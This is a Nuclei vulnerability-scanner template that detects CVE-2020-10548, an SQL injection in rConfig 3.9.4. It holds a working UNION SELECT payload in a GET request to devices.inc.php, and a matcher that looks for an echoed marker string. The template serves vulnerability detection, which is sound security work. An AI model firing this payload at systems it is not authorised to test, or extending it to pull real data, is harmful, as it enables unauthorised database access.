nuclei-templates/cves/2020/CVE-2020-10548.yaml

22 lines
667 B
YAML

id: CVE-2020-10548
info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
tags: cve,cve2020,rconfig,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[project-discovery]"
part: body